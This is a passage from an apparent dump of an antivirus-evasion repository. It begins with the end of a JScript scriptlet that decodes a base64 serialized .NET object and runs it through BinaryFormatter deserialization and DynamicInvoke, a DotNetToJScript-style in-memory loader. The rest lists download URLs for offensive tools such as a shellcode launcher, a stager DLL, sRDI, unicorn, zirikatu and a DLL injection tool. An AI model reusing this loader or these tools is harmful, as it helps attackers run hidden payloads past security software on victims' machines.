155 | "AAAAAAAAAAAAAAAAAAAAACAAAAwAAAAwPQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
156 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
157 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
158 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
159 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
160 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
161 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
162 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
163 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
164 | "AAAAAAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVj"+
165 | "dGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
166 | var entry_class = 'TestClass';
167 |
168 | try {
169 | setversion();
170 | var stm = base64ToStream(serialized_obj);
171 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
172 | var al = new ActiveXObject('System.Collections.ArrayList');
173 | var n = fmt.SurrogateSelector;
174 | var d = fmt.Deserialize_2(stm);
175 | al.Add(n);
176 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
177 |
178 | } catch (e) {
179 | debug(e.message);
180 | }]]></script>
181 | </registration>
182 | </component>
183 | </package>
--------------------------------------------------------------------------------
/tools/py2exe-0.6.9.win32-py2.7.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/py2exe-0.6.9.win32-py2.7.exe
--------------------------------------------------------------------------------
/tools/pyinstaller-3.5.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/pyinstaller-3.5.zip
--------------------------------------------------------------------------------
/tools/sRDI.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/sRDI.zip
--------------------------------------------------------------------------------
/tools/shellcode_launcher.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/shellcode_launcher.zip
--------------------------------------------------------------------------------
/tools/stager.dll.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/stager.dll.zip
--------------------------------------------------------------------------------
/tools/unicorn.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/unicorn.tar.gz
--------------------------------------------------------------------------------
/tools/zirikatu.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/zirikatu.tar.gz
--------------------------------------------------------------------------------
/tools/自动化dll注入工具-Dll(IAT).exe.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/自动化dll注入工具-Dll(IAT).exe.zip
--------------------------------------------------------------------------------